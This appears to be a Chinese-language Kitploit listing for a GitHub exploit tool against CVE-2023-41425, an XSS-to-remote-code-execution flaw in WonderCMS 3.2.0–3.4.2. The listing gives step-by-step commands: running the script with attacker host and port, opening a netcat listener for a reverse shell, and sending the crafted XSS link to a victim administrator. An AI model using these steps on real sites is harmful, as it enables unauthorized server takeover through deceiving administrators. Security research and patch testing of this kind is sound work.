Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-41425-wonderCMS_RCE — CVE-2023-41425 - Wonder CMS v.3.2.0 至 v.3.4.2 版本中存在跨站脚本(XSS)漏洞,允许远程攻击者通过上传到 installModule 组件的特制脚本执行任意代码。 | Kitploit
工具/GitHubGitHub/thefizzyfish/cve-2023-41425-wondercms_rce
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubthefizzyfish/cve-2023-41425-wondercms_rce

CVE-2023-41425-wonderCMS_RCE

CVE-2023-41425 - Wonder CMS v.3.2.0 至 v.3.4.2 版本中存在跨站脚本(XSS)漏洞,允许远程攻击者通过上传到 installModule 组件的特制脚本执行任意代码。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
21年前尚未审核

CVE-2023-41425-wonderCMS_RCE

Wonder CMS v.3.2.0 至 v.3.4.2 版本中存在跨站脚本(XSS)漏洞,允许远程攻击者通过上传到 installModule 组件的恶意脚本执行任意代码。仅用于教育目的

需要知道 loginURL、拥有管理员访问权限,或能够诱使管理员点击 XSS 链接。

  1. 克隆仓库
root@kitploit:~
git clone https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE.git
  1. 运行
root@kitploit:~
usage: CVE-2023-41425.py [-h] -rhost RHOST -lhost LHOST -lport LPORT -sport SPORT
python3 CVE-2023-41425.py -rhost http://example.com/loginURL -lhost 10.10.14.7 -lport 9001 -sport 8000
  1. 设置本地监听
root@kitploit:~
nc -lnvp 9001
  1. 将打印出的 XSS URL 发送给受害者;如果你有管理员权限,也可以直接点击它
  2. 等待回调

image

致谢

感谢 prodigiousMind 发现并报告此漏洞 https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

下载工具